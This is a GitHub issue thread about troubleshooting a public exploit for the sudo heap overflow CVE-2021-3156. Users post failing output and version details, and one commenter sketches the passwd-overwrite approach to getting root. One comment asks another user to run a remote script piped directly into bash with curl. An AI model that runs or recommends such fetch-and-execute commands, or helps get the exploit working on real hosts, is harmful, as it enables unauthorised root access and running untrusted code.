CVE-2021-3156 icon indicating copy to clipboard operation
CVE-2021-3156 copied to clipboard

Published 20 hours ago verified publisher icon stong

Edited

Open aloksaurabh opened this issue 4 years ago • 6 comments

Edited

aloksaurabh avatar Jan 30 '21 11:01 aloksaurabh

Maybe realise that this is not an exploit but a meme exploit. You've been fooled.

Nero22k avatar Jan 30 '21 12:01 Nero22k

the meme is a user name :D with uid 10000 blala, the trick of this exploit is that when you copy the original passwd file to your fake, you must change your uid with this one of root uid which is 0 and then you using this buffer overflow exploit to push - replace a.k.a override this fake file fakepasswd with your original passwd file :D pahah this is already patched. g00d job stong. If someone wants to exploit this Sudo stupid dev wrong, please do not UPGRADE your OS because this is already patched, and if you do this you will never exploit this STUPID DEV ERROR ;), just like that, for testing! BR

nu11secur1ty avatar Jan 30 '21 19:01 nu11secur1ty

I see the output like this which is different form the video

ayylmaobigchungussssssssssss0000000000000000000000000000004996
sudoedit: no password was provided
ayylmaobigchungussssssssssss0000000000000000000000000000004997
sudoedit: no password was provided

Is the test account supposed to have empty password ? But i see an x after meme in the video

RACE_SLEEP_TIME values tried 7000 - 14000

Sysinfo

ubuntu:~/Desktop/2$ uname -a
Linux ubuntu 5.8.0-41-generic #46~20.04.1-Ubuntu SMP Mon Jan 18 17:52:23 UTC 2021 x86_64 x86_64 x86_64 GNU/Linux
@ubuntu:~/Desktop/2$ sudo --version
Sudo version 1.8.31
Sudoers policy plugin version 1.8.31
Sudoers file grammar version 46
Sudoers I/O plugin version 1.8.31

Hello dear friend, can you execute this command in your terminal please like a user, and then paste here your output, please? If you want of course.

curl -s https://raw.githubusercontent.com/nu11secur1ty/CVE-mitre/main/CVE-2021-3156/sohoshi/sohoshi.sh | bash BR Thank you =)

nu11secur1ty avatar Jan 30 '21 20:01 nu11secur1ty

it doesn't work for me :(

meme@charles-VirtualBox:/opt/CVE-2021-3156$ uname -a
Linux charles-VirtualBox 5.4.0-42-generic #46~18.04.1-Ubuntu SMP Fri Jul 10 07:21:24 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux
meme@charles-VirtualBox:/opt/CVE-2021-3156$ sudo -V
Sudo version 1.8.21p2
Sudoers policy plugin version 1.8.21p2
Sudoers file grammar version 46
Sudoers I/O plugin version 1.8.21p2

dickens88 avatar Feb 01 '21 01:02 dickens88

it doesn't work for me :(

meme@charles-VirtualBox:/opt/CVE-2021-3156$ uname -a
Linux charles-VirtualBox 5.4.0-42-generic #46~18.04.1-Ubuntu SMP Fri Jul 10 07:21:24 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux
meme@charles-VirtualBox:/opt/CVE-2021-3156$ sudo -V
Sudo version 1.8.21p2
Sudoers policy plugin version 1.8.21p2
Sudoers file grammar version 46
Sudoers I/O plugin version 1.8.21p2

Does it make a bunch of directories in the current dir?

Edit: you can also try r4j's exploit which is the exact same strategy (timestamp dir race condition) and bug, but have some slightly different offsets.

stong avatar Feb 01 '21 03:02 stong

it doesn't work for me :(

meme@charles-VirtualBox:/opt/CVE-2021-3156$ uname -a
Linux charles-VirtualBox 5.4.0-42-generic #46~18.04.1-Ubuntu SMP Fri Jul 10 07:21:24 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux
meme@charles-VirtualBox:/opt/CVE-2021-3156$ sudo -V
Sudo version 1.8.21p2
Sudoers policy plugin version 1.8.21p2
Sudoers file grammar version 46
Sudoers I/O plugin version 1.8.21p2

If you have made an update to your Linux OS with a package manager you will never make exploit this vulnerability! So, everything is rebuilt from Linux vendors, on level groups, and profiles ;) and patched from Sudo devs ;) By the way, the patch has been pushed out of the internet, using your package manager in a background process! BR

nu11secur1ty avatar Feb 01 '21 14:02 nu11secur1ty